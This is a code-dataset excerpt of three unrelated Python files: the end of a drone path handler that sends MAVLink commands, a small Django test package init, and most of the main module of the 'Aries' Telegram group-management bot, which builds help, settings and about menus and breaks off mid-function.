location_helpers.addVectorToLocation(self.initialLocation, offsetVector)\n\n # calc dot product so we can assign a sign to the distance\n vectorToTarget = location_helpers.getVectorFromPoints( self.initialLocation, self.vehicle.location.global_relative_frame)\n dp = self.unitVector.x * vectorToTarget.x\n dp += self.unitVector.y * vectorToTarget.y\n dp += self.unitVector.z * vectorToTarget.z\n \n self.actualDistance = location_helpers.getDistanceFromPoints3d(self.initialLocation, self.vehicle.location.global_relative_frame)\n\n if (dp < 0):\n self.actualDistance = -self.actualDistance\n\n # We can now compare the actual vs vector distance\n self.distError = self.actualDistance - self.distance\n \n # formulate mavlink message for pos-vel controller\n posVelMsg = self.vehicle.message_factory.set_position_target_global_int_encode(\n 0, # time_boot_ms (not used)\n 0, 1, # target system, target component\n mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, # frame\n 0b0000110111000000, # type_mask - enable pos/vel\n int(loc.lat * 10000000), # latitude (degrees*1.0e7)\n int(loc.lon * 10000000), # longitude (degrees*1.0e7)\n loc.alt, # altitude (meters)\n velVector.x, velVector.y, velVector.z, # North, East, Down velocity (m/s)\n 0, 0, 0, # x, y, z acceleration (not used)\n 0, 0) # yaw, yaw_rate (not used)\n\n # send pos-vel command to vehicle\n self.vehicle.send_mavlink(posVelMsg)\n\n\n def getUnitVectorFromHeadingAndTilt(self, heading, tilt):\n ''' generate a vector from the camera gimbal '''\n angle = math.radians(90 - heading)\n tilt = math.radians(tilt)\n \n # create a vector scaled by tilt\n x = math.cos(tilt)\n \n # Rotate the vector\n nx = x * math.cos(angle)\n ny = x * math.sin(angle)\n\n # Up\n z = math.sin(tilt)\n \n return Vector3(ny, nx, z)\n\n","repo_name":"OpenSolo/OpenSolo","sub_path":"shotmanager/vectorPathHandler.py","file_name":"vectorPathHandler.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"47"} +{"seq_id":"75140996941","text":"# pylint: disable=wrong-import-position\n\nAPP_NAME = \"resource_management\"\nOPERATION_NAME = \"get_authorized_users_for_item\"\nREQUEST_METHOD = \"get\"\nURL_SUFFIX = \"get/item/users/\"\n\nfrom .test_case_01 import TestCase01GetAuthorizedUsersForItemAPITestCase\n\n__all__ = [\n \"TestCase01GetAuthorizedUsersForItemAPITestCase\"\n]\n","repo_name":"bammidichandini/resource_management-chandini","sub_path":"resource_management/views/get_authorized_users_for_item/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33793118016","text":"import importlib\nimport re\nimport sys\nimport time\nimport datetime\nfrom sys import argv\nfrom typing import Optional, List\n\nfrom pyrogram import filters\nfrom telegram import (\n Chat,\n InlineKeyboardButton,\n InlineKeyboardMarkup,\n ReplyKeyboardMarkup,\n KeyboardButton,\n Message,\n ParseMode,\n Update,\n User,\n Bot,\n)\nfrom telegram.error import (\n BadRequest,\n ChatMigrated,\n NetworkError,\n TelegramError,\n TimedOut,\n Unauthorized,\n)\nfrom telegram.ext import (\n CallbackContext,\n CallbackQueryHandler,\n CommandHandler,\n Filters,\n MessageHandler,\n)\nfrom telegram.ext.dispatcher import run_async, DispatcherHandlerStop, Dispatcher\nfrom telegram.utils.helpers import escape_markdown\n\nfrom aries import (\n ALLOW_EXCL,\n BL_CHATS,\n CERT_PATH,\n DONATION_LINK,\n LOGGER,\n PORT,\n SUPPORT_CHAT,\n TOKEN,\n URL,\n WEBHOOK,\n WHITELIST_CHATS,\n StartTime,\n dispatcher,\n pbot,\n telethn,\n ubot,\n updater,\n)\n\n# needed to dynamically load modules\n# NOTE: Module order is not guaranteed, specify that in the config file!\nfrom aries.modules import ALL_MODULES\nfrom aries.modules.helper_funcs.alternate import typing_action\nfrom aries.modules.helper_funcs.chat_status import is_user_admin\nfrom aries.modules.helper_funcs.misc import paginate_modules\nfrom aries.modules.helper_funcs.readable_time import get_readable_time\nfrom aries.modules.sql import users_sql as sql\n\nHELP_MSG = \"Click The Button Below To Get Help Menu In Your Private Message.\"\nHELP_IMG = \"https://telegra.ph/file/ac893610cae84f302b2da.jpg\"\nGROUP_START_IMG = (\n \"CAACAgIAAx0CXBdkHQAC34lhpHKAV3nIlqfcnYmDkIhbOFTktwACFBAAAkXe2EuBs3crQ6mMdR4E\"\n)\n\nPM_START_TEXT = \"\"\"\nHello there, [👋](https://telegra.ph/file/ac893610cae84f302b2da.jpg) I'm {}.\nIm Powerfull Management Bot And I Will Help In Managing Your Group.\nMaintained by : [Aryza](https://t.me/idzxartez)\nFounder And Dev Of : [IDZEROID SYNDICATES](https://t.me/idzeroidsupport).\n➖➖➖➖➖➖➖➖➖➖➖➖➖\n• *Uptime:* `{}`\n• `{}` *Users, across* `{}` *chats.*\n➖➖➖➖➖➖➖➖➖➖➖➖➖\nMade specifically to manage your group , I specialize in managing Entertainment and all type groups and channels.\n✪ Make sure you read *DETAILS* Section Below ✪ \n\"\"\"\n\nbuttons = [\n [\n InlineKeyboardButton(text=\" 「 Details 」\", callback_data=\"aboutmanu_\"),\n InlineKeyboardButton(text=\" 「 Inline 」\", switch_inline_query_current_chat=\"\"),\n ],\n [\n InlineKeyboardButton(\n text=\" ➕ 「 Summon Me 」➕ \",\n url=\"t.me/idzeroid_bot?startgroup=true\",\n ),\n ],\n [\n InlineKeyboardButton(text=\" 「 Support 」\", url=\"http://t.me/idzeroidsupport\"),\n InlineKeyboardButton(text=\" [❌] \", callback_data=\"close\"),\n InlineKeyboardButton(text=\" 「 Update 」\", url=\"http://t.me/idzeroid\"),\n ],\n]\n\n\nHELP_STRINGS = f\"\"\"\n*Main Commands :* [Saint Aries](https://telegra.ph/file/ac893610cae84f302b2da.jpg)\n✪ /start: Starts me! You've probably already used this.\n✪ /help: Click this, I'll let you know about myself!\n✪ /donate: You can support my creater using this command.\n✪ /settings: \n ◔ in PM: will send you your settings for all supported modules.\n ◔ in a Group: will redirect you to pm, with all that chat's settings.\n\"\"\".format(\n dispatcher.bot.first_name,\n \"\" if not ALLOW_EXCL else \"\\nAll commands can either be used with / or !.\\n\",\n)\n\n\nDONATE_STRING = \"\"\"Hello, glad to hear you want to donate!\n You can support the project via [pulsa](#) or by contacting @IdzXartez\\\n Supporting isnt always financial! \\\n Those who cannot provide monetary support are welcome to help us develop the bot at .\"\"\"\n\nIMPORTED = {}\nMIGRATEABLE = []\nHELPABLE = {}\nSTATS = []\nUSER_INFO = []\nUSER_BOOK = []\nDATA_IMPORT = []\nDATA_EXPORT = []\n\nCHAT_SETTINGS = {}\nUSER_SETTINGS = {}\n\nGDPR = []\n\nfor module_name in ALL_MODULES:\n imported_module = importlib.import_module(\"aries.modules.\" + module_name)\n if not hasattr(imported_module, \"__mod_name__\"):\n imported_module.__mod_name__ = imported_module.__name__\n\n if not imported_module.__mod_name__.lower() in IMPORTED:\n IMPORTED[imported_module.__mod_name__.lower()] = imported_module\n else:\n raise Exception(\"Can't have two modules with the same name! Please change one\")\n\n if hasattr(imported_module, \"__help__\") and imported_module.__help__:\n HELPABLE[imported_module.__mod_name__.lower()] = imported_module\n\n if hasattr(imported_module, \"get_help\") and imported_module.get_help:\n HELPABLE[imported_module.__mod_name__.lower()] = imported_module\n\n # Chats to migrate on chat_migrated events\n if hasattr(imported_module, \"__migrate__\"):\n MIGRATEABLE.append(imported_module)\n\n if hasattr(imported_module, \"__stats__\"):\n STATS.append(imported_module)\n\n if hasattr(imported_module, \"__gdpr__\"):\n GDPR.append(imported_module)\n\n if hasattr(imported_module, \"__user_info__\"):\n USER_INFO.append(imported_module)\n\n if hasattr(imported_module, \"__user_book__\"):\n USER_BOOK.append(imported_module)\n\n if hasattr(imported_module, \"__import_data__\"):\n DATA_IMPORT.append(imported_module)\n\n if hasattr(imported_module, \"__export_data__\"):\n DATA_EXPORT.append(imported_module)\n\n if hasattr(imported_module, \"__chat_settings__\"):\n CHAT_SETTINGS[imported_module.__mod_name__.lower()] = imported_module\n\n if hasattr(imported_module, \"__user_settings__\"):\n USER_SETTINGS[imported_module.__mod_name__.lower()] = imported_module\n\n\n# do not async\ndef send_help(chat_id, text, keyboard=None):\n if not keyboard:\n keyboard = InlineKeyboardMarkup(paginate_modules(0, HELPABLE, \"help\"))\n dispatcher.bot.send_message(\n chat_id=chat_id, text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard\n )\n\n\ndef test(update, context):\n try:\n print(update)\n except:\n pass\n update.effective_message.reply_text(\n \"Hola tester! _I_ *have* `markdown`\", parse_mode=ParseMode.MARKDOWN\n )\n update.effective_message.reply_text(\"This person edited a message\")\n print(update.effective_message)\n\n\ndef start(update: Update, context: CallbackContext):\n args = context.args\n message = update.effective_message\n uptime = get_readable_time((time.time() - StartTime))\n if update.effective_chat.type == \"private\":\n if len(args) >= 1:\n if args[0].lower() == \"help\":\n send_help(update.effective_chat.id, HELP_STRINGS)\n elif args[0].lower().startswith(\"ghelp_\"):\n mod = args[0].lower().split(\"_\", 1)[1]\n if not HELPABLE.get(mod, False):\n return\n send_help(\n update.effective_chat.id,\n HELPABLE[mod].__help__,\n InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"⬅️ BACK\", callback_data=\"help_back\"\n )\n ]\n ]\n ),\n )\n elif args[0].lower() == \"markdownhelp\":\n IMPORTED[\"extras\"].markdown_help_sender(update)\n elif args[0].lower().startswith(\"stngs_\"):\n match = re.match(\"stngs_(.*)\", args[0].lower())\n chat = dispatcher.bot.getChat(match.group(1))\n\n if is_user_admin(chat, update.effective_user.id):\n send_settings(match.group(1), update.effective_user.id, False)\n else:\n send_settings(match.group(1), update.effective_user.id, True)\n\n elif args[0][1:].isdigit() and \"rules\" in IMPORTED:\n IMPORTED[\"rules\"].send_rules(update, args[0], from_pm=True)\n\n else:\n message.reply_text(\n PM_START_TEXT.format(\n escape_markdown(context.bot.first_name),\n escape_markdown(uptime),\n sql.num_users(),\n sql.num_chats(),\n ),\n reply_markup=InlineKeyboardMarkup(buttons),\n parse_mode=ParseMode.MARKDOWN,\n timeout=60,\n )\n else:\n message.reply_animation(\n GROUP_START_IMG,\n caption=\" Aries Online \\nI am Awake Since: {}\".format(\n uptime\n ),\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Support\", url=f\"https://telegram.dog/idzeroidsupport\"\n ),\n InlineKeyboardButton(\n text=\"Updates\", url=\"https://telegram.dog/idzeroid\"\n ),\n ],\n ]\n ),\n )\n\n\n# for test purposes\ndef error_callback(update: Update, context: CallbackContext):\n error = context.error\n try:\n raise error\n except Unauthorized:\n print(\"no nono1\")\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(\"no nono2\")\n print(\"BadRequest caught\")\n print(error)\n\n # handle malformed requests - read more below!\n except TimedOut:\n print(\"no nono3\")\n # handle slow connection problems\n except NetworkError:\n print(\"no nono4\")\n # handle other connection problems\n except ChatMigrated as err:\n print(\"no nono5\")\n print(err)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef help_button(update, context):\n query = update.callback_query\n mod_match = re.match(r\"help_module\\((.+?)\\)\", query.data)\n prev_match = re.match(r\"help_prev\\((.+?)\\)\", query.data)\n next_match = re.match(r\"help_next\\((.+?)\\)\", query.data)\n back_match = re.match(r\"help_back\", query.data)\n try:\n if mod_match:\n module = mod_match.group(1)\n text = (\n \"* 「 Help for {} module 」*\\n\".format(HELPABLE[module].__mod_name__)\n + HELPABLE[module].__help__\n )\n query.message.edit_text(\n text=text,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Back\", callback_data=\"help_back\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Support\", url=\"https://t.me/idzeroidsupport\"\n ),\n ],\n ]\n ),\n )\n elif prev_match:\n curr_page = int(prev_match.group(1))\n query.message.edit_text(\n HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(curr_page - 1, HELPABLE, \"help\")\n ),\n )\n\n elif next_match:\n next_page = int(next_match.group(1))\n query.message.edit_text(\n HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(next_page + 1, HELPABLE, \"help\")\n ),\n )\n\n elif back_match:\n query.message.edit_text(\n text=HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, HELPABLE, \"help\")\n ),\n )\n\n # ensure no spinny white circle\n context.bot.answer_callback_query(query.id)\n # query.message.delete()\n except Exception as excp:\n if excp.message == \"Message is not modified\":\n pass\n elif excp.message == \"Query_id_invalid\":\n pass\n elif excp.message == \"Message can't be deleted\":\n pass\n else:\n query.message.edit_text(excp.message)\n LOGGER.exception(\"Exception in help buttons. %s\", str(query.data))\n\n\ndef aries_about_callback(update, context):\n query = update.callback_query\n if query.data == \"aboutmanu_\":\n query.message.edit_text(\n text=f\"*👋Hi again! The name's {dispatcher.bot.first_name} \\n\\nA powerful group management bot built to help you manage your group easily.* \"\n f\"\\n\\n 🔥 Join [Idzeroid Syndicates](https://t.me/idzeroidsupport) To Keep Yourself Updated About {dispatcher.bot.first_name} 🔥\"\n f\"\\n\\n I have the normal GROUP MANAGING functions like flood control, a warning system etc but I mainly have the advanced and handy Antispam system and the SIBYL banning system which safegaurds and helps your group from spammers.\"\n f\"\\n\\n ⚡️ 》 I can restrict users.\"\n f\"\\n\\n ⚡️ 》 I can greet users with customizable welcome messages and even set a group's rules.\"\n f\"\\n\\n ⚡️ 》 I have an advanced anti-flood system.\"\n f\"\\n\\n ⚡️ 》 I can warn users until they reach max warns, with each predefined actions such as ban, mute, kick, etc.\"\n f\"\\n\\n ⚡️ 》 I have a note keeping system, blacklists, and even predetermined replies on certain keywords.\"\n f\"\\n\\n ⚡️ 》 I check for admins' permissions before executing any command and more stuffs\"\n f\"\\n\\n If you have any question about *Aries*, let us know at @IdzeroidSupport.\"\n f\"\\n\\n👇 You Can Know More About *Aries* By Clicking The Below Buttons 👇\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"How To Use Me\", callback_data=\"aboutmanu_howto\"\n ),\n InlineKeyboardButton(\n text=\"T.A.C\", callback_data=\"aboutmanu_tac\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Help & Commands\", callback_data=\"help_back\"\n )\n ],\n [InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_back\")],\n ]\n ),\n )\n elif query.data == \"aboutmanu_back\":\n query.message.edit_text(\n PM_START_TEXT.format(\n escape_markdown(context.bot.first_name),\n escape_markdown(get_readable_time((time.time() - StartTime))),\n sql.num_users(),\n sql.num_chats(),\n ),\n reply_markup=InlineKeyboardMarkup(buttons),\n parse_mode=ParseMode.MARKDOWN,\n timeout=60,\n )\n\n elif query.data == \"aboutmanu_howto\":\n query.message.edit_text(\n text=f\"* 「 BASIC HELP 」*\"\n f\"\\nIf You Can Also Add {dispatcher.bot.first_name} To Your Chats By Clicking [Here](http://t.me/{dispatcher.bot.username}?startgroup=true) And Selecting Chat. \\n\"\n f\"\\n\\nYou Can get support {dispatcher.bot.first_name} by joining [support](https://t.me/idzeroidsupport).\\n\"\n f\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Admins Settings\", callback_data=\"aboutmanu_permis\"\n ),\n InlineKeyboardButton(\n text=\"Anti Spam\", callback_data=\"aboutmanu_spamprot\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Music Setup\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n [InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_\")],\n ]\n ),\n )\n elif query.data == \"aboutmanu_credit\":\n query.message.edit_text(\n text=f\"*Aries Is the redisigned version of Daisy and Saitama And Othrer for the best performance.*\"\n f\"\\n\\nAries source code was rewritten by @IdzXartez and All Of Conrtibutor For Help Aries\"\n f\"\\n\\nIf Any Question About aries, \\nLet Us Know At @Idzeroidsupport.\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_tac\")]]\n ),\n )\n\n elif query.data == \"aboutmanu_permis\":\n query.message.edit_text(\n text=f\" 「 Admin Permissions 」\"\n f\"\\nTo avoid slowing down, {dispatcher.bot.first_name} caches admin rights for each user. This cache lasts about 10 minutes; this may change in the future. This means that if you promote a user manually (without using the /promote command), {dispatcher.bot.first_name} will only find out ~10 minutes later.\"\n f\"\\n\\nIF you want to update them immediately, you can use the /admincache command,thta'll force {dispatcher.bot.first_name} to check who the admins are again and their permissions\"\n f\"\\n\\nIf you are getting a message saying:\"\n f\"\\nYou must be this chat administrator to perform this action!\"\n f\"\\nThis has nothing to do with {dispatcher.bot.first_name}'s rights; this is all about YOUR permissions as an admin. {dispatcher.bot.first_name} respects admin permissions; if you do not have the Ban Users permission as a telegram admin, you won't be able to ban users with {dispatcher.bot.first_name}. Similarly, to change {dispatcher.bot.first_name} settings, you need to have the Change group info permission.\"\n f\"\\n\\nThe message very clearly says that you need these rights - not {dispatcher.bot.first_name}.\",\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_howto\")]]\n ),\n )\n elif query.data == \"aboutmanu_spamprot\":\n query.message.edit_text(\n text=\"* 「 Anti-Spam Settings 」*\"\n \"\\n- /antispam : Change antispam security settings in the group, or return your current settings(when no arguments).\"\n \"\\n_This helps protect you and your groups by removing spam flooders as quickly as possible._\"\n \"\\n\\n- /setflood : enables or disables flood control\"\n \"\\n- /setfloodmode : Action to perform when user have exceeded flood limit. ban/kick/mute/tmute/tban\"\n \"\\n_Antiflood allows you to take action on users that send more than x messages in a row. Exceeding the set flood will result in restricting that user._\"\n \"\\n\\n- /addblacklist : Add a trigger to the blacklist. Each line is considered one trigger, so using different lines will allow you to add multiple triggers.\"\n \"\\n- /blacklistmode : Action to perform when someone sends blacklisted words.\"\n \"\\n_Blacklists are used to stop certain triggers from being said in a group. Any time the trigger is mentioned, the message will immediately be deleted. A good combo is sometimes to pair this up with warn filters!_\"\n \"\\n\\n- /reports : Change report setting, or view current status.\"\n \"\\n • If done in pm, toggles your status.\"\n \"\\n • If in chat, toggles that chat's status.\"\n \"\\n_If someone in your group thinks someone needs reporting, they now have an easy way to call all admins._\"\n \"\\n\\n- /lock : Lock items of a certain type (not available in private)\"\n \"\\n- /locktypes: Lists all possible locktypes\"\n \"\\n_The locks module allows you to lock away some common items in the telegram world; the bot will automatically delete them!_\"\n '\\n\\n- /addwarn : Sets a warning filter on a certain keyword. If you want your keyword to be a sentence, encompass it with quotes, as such: /addwarn \"very angry\" This is an angry user. '\n \"\\n- /warn : Warns a user. After 3 warns, the user will be banned from the group. Can also be used as a reply.\"\n \"\\n- /strongwarn : If set to on, exceeding the warn limit will result in a ban. Else, will just kick.\"\n \"\\n_If you're looking for a way to automatically warn users when they say certain things, use the /addwarn command._\"\n \"\\n\\n- /welcomemute : All users that join, get muted\"\n \"\\n_ A button gets added to the welcome message for them to unmute themselves. This proves they aren't a bot! soft - restricts users ability to post media for 24 hours. strong - mutes on join until they prove they're not bots._\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_howto\")]]\n ),\n )\n elif query.data == \"aboutmanu_tac\":\n query.message.edit_text(\n text=f\" 「 Terms and Conditions 」\\n\"\n f\"\\nTo Use This Bot, You Need To Read Terms and Conditions Carefully.\\n\"\n f\"\\n✪ We always respect your privacy \\n We never log into bot's api and spying on you \\n We use a encripted database \\n Bot will automatically stops if someone logged in with api.\"\n f\"\\n✪ Always try to keep credits, so \\n This hardwork is done by @IdzXartez spending many sleepless nights.. So, Respect it.\"\n f\"\\n✪ Some modules in this bot is owned by different authors, So, \\n All credits goes to them \\n Also for Paul Larson for Marie.\"\n f\"\\n✪ If you need to ask anything about \\n this bot, Go @Idzeroidsupport.\"\n f\"\\n✪ If you asking nonsense in Support \\n Chat, you will get warned/banned.\"\n f\"\\n✪ All api's we used owned by originnal authors \\n Some api's we use Free version \\n Please don't overuse AI Chat.\"\n f\"\\n\\nFor any kind of help, related to this bot, Join @idzeroidsupport.\"\n f\"\\n\\nTerms & Conditions will be changed anytime\\n\",\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Credits\", callback_data=\"aboutmanu_credit\"\n ),\n InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_\"),\n ]\n ]\n ),\n )\n elif query.data == \"aboutmanu_cbguide\":\n query.message.edit_text(\n text=f\"* 「 How To Setup Music 」*\\n\"\n f\"\\n1. **first, add me to your group.\"\n f\"\\n2. **then promote me as admin and give all permissions except anonymous admin.\"\n f\"\\n3. **after promoting me, type /admincache in group to update the admin list.\"\n f\"\\n4. **add @IdzMusic to your group.\"\n f\"\\n5. **turn on the video chat first before start to play music.\\n\\n\"\n f\"\\n📌 **if the userbot not joined to video chat, make sure if the video chat already turned on, or you can ask Admins in @idzeroidsupport.**\\n\"\n f\"\\n⚡ __Powered by Aries A.I__\\n\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"[⇜]\", callback_data=\"aboutmanu_cbhelps\"\n ),\n InlineKeyboardButton(text=\"🔄\", callback_data=\"aboutmanu_howto\"),\n InlineKeyboardButton(\n text=\"[⇝]\", callback_data=\"aboutmanu_cbhelps\"\n ),\n ],\n ]\n ),\n )\n elif query.data == \"aboutmanu_cbhelps\":\n query.message.edit_text(\n text=f\"* 「 Music Command 」*\\n\"\n f\"\\n1. **/play (name song) for playing music.\"\n f\"\\n2. **/pause for paused music.\"\n f\"\\n3. **/resume for resume music.\"\n f\"\\n4. **/stop or /end for end music playing.\"\n f\"\\n5. **/music (name song) for download song.\"\n f\"\\n6. **/video (name video) for download video.\"\n f\"\\n7. **/lyrics for searching lyrics.\\n\\n\"\n f\"\\n📌 **Also you can download music or video with push button menu.**\\n\"\n f\"\\n⚡ __Powered by Aries A.I__\\n\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"[⇜]\", callback_data=\"aboutmanu_cbguide\"\n ),\n InlineKeyboardButton(text=\"🔄\", callback_data=\"aboutmanu_howto\"),\n InlineKeyboardButton(\n text=\"[⇝]\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n ]\n ),\n )\n\n\n@typing_action\ndef get_help(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n args = update.effective_message.text.split(None, 1)\n\n # ONLY send help in PM\n if chat.type != chat.PRIVATE:\n if len(args) >= 2 and any(args[1].lower() == x for x in HELPABLE):\n module = args[1].lower()\n update.effective_message.animation(\n HELP_IMG,\n HELP_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Help\",\n url=\"t.me/{}?start=ghelp_{}\".format(\n context.bot.username, module\n ),\n )\n ]\n ]\n ),\n )\n return\n update.effective_message.reply_text(\n \"Contact me in PM to get the list of possible commands.\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Help\",\n url=\"t.me/{}?start=help\".format(context.bot.username),\n )\n ],\n [\n InlineKeyboardButton(\n text=\"Support\", url=f\"https://telegram.dog/idzeroidsupport\"\n ),\n InlineKeyboardButton(\n text=\"Updates\", url=\"https://telegram.dog/idzeroid\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Music Setup\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n ]\n ),\n )\n return\n\n elif len(args) >= 2 and any(args[1].lower() == x for x in HELPABLE):\n module = args[1].lower()\n text = (\n \"Here is the available help for the *{}* module:\\n\".format(\n HELPABLE[module].__mod_name__\n )\n + HELPABLE[module].__help__\n )\n send_help(\n chat.id,\n text,\n InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")]]\n ),\n )\n\n else:\n send_help(chat.id, HELP_STRINGS)\n\n\ndef send_settings(chat_id, user_id, user=False):\n if user:\n if USER_SETTINGS:\n settings = \"\\n\\n\".join(\n \"*{}*:\\n{}\".format(mod.__mod_name__, mod.__user_settings__(user_id))\n for mod in USER_SETTINGS.values()\n )\n dispatcher.bot.send_message(\n user_id,\n \"These are your current settings:\" + \"\\n\\n\" + settings,\n parse_mode=ParseMode.MARKDOWN,\n )\n\n else:\n dispatcher.bot.send_message(\n user_id,\n \"Seems like there aren't any user specific settings available :'(\",\n parse_mode=ParseMode.MARKDOWN,\n )\n\n else:\n if CHAT_SETTINGS:\n chat_name = dispatcher.bot.getChat(chat_id).title\n dispatcher.bot.send_message(\n user_id,\n text=\"Which module would you like to check {}'s settings for?\".format(\n chat_name\n ),\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, CHAT_SETTINGS, \"stngs\", chat=chat_id)\n ),\n )\n else:\n dispatcher.bot.send_message(\n user_id,\n \"Seems like there aren't any chat settings available :'(\\nSend this \"\n \"in a group chat you're admin in to find its current settings!\",\n parse_mode=ParseMode.MARKDOWN,\n )\n\n\ndef settings_button(update, context):\n query = update.callback_query\n user = update.effective_user\n mod_match = re.match(r\"stngs_module\\((.+?),(.+?)\\)\", query.data)\n prev_match = re.match(r\"stngs_prev\\((.+?),(.+?)\\)\", query.data)\n next_match = re.match(r\"stngs_next\\((.+?),(.+?)\\)\", query.data)\n back_match = re.match(r\"stngs_back\\((.+?)\\)\", query.data)\n try:\n if mod_match:\n chat_id = mod_match.group(1)\n module = mod_match.group(2)\n chat = context.bot.get_chat(chat_id)\n text = \"*{}* has the following settings for the *{}* module:\\n\\n\".format(\n escape_markdown(chat.title), CHAT_SETTINGS[module].__mod_name__\n ) + CHAT_SETTINGS[module].__chat_settings__(chat_id, user.id)\n query.message.edit_text(\n text=text,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Back\",\n callback_data=\"stngs_back({})\".format(chat_id),\n )\n ]\n ]\n ),\n )\n\n elif prev_match:\n chat_id = prev_match.group(1)\n curr_page = int(prev_match.group(2))\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n \"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(chat.title),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(\n curr_page - 1, CHAT_SETTINGS, \"stngs\", chat=chat_id\n )\n ),\n )\n\n elif next_match:\n chat_id = next_match.group(1)\n next_page = int(next_match.group(2))\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n \"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(chat.title),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(\n next_page + 1, CHAT_SETTINGS, \"stngs\", chat=chat_id\n )\n ),\n )\n\n elif back_match:\n chat_id = back_match.group(1)\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n text=\"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(escape_markdown(chat.title)),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, CHAT_SETTINGS, \"stngs\", chat=chat_id)\n ),\n )\n\n # ensure no spinny white circle\n context.bot.answer_callback_query(query.id)\n # query.message.delete()\n except Exception as excp:\n if excp.message == \"Message is not modified\":\n pass\n elif excp.message == \"Query_id_invalid\":\n pass\n elif excp.message == \"Message can't be deleted\":\n pass\n else:\n query.message.edit_text(excp.message)\n LOGGER.exception(\"Exception in settings buttons. %s\", str(query.data))\n\n\ndef get_settings(update: Update, context: CallbackContext):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n\n # ONLY send settings in PM\n if chat.type != chat.PRIVATE:\n if is_user_admin(chat, user.id):\n text = \"Click here to get this chat's settings, as well as yours.\"\n msg.reply_text(\n text,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Settings\",\n url=\"t.me/{}?start=stngs_{}\".format(\n context.bot.username, chat.id\n ),\n )\n ]\n ]\n ),\n )\n else:\n text = \"Click here to check your settings.\"\n\n else:\n send_settings(chat.id, user.id, True)\n\n\ndef migrate_chats(update, context):\n msg = update.effective_message # type: Optional[Message]\n if msg.migrate_to_chat_id:\n old_chat = update.effective_chat.id\n new_chat = msg.migrate_to_chat_id\n elif msg.migrate_from_chat_id:\n old_chat = msg.migrate_from_chat_id\n new_chat = update.effective_chat.id\n else:\n return\n\n LOGGER.info(\"Migrating from %s, to %s\", str(old_chat), str(new_chat))\n for mod in MIGRATEABLE:\n mod.__migrate__(old_chat, new_chat)\n\n LOGGER.info(\"Successfully migrated!\")\n raise DispatcherHandlerStop\n\n\ndef is_chat_allowed(update, context):\n if len(WHITELIST_CHATS) != 0:\n chat_id = 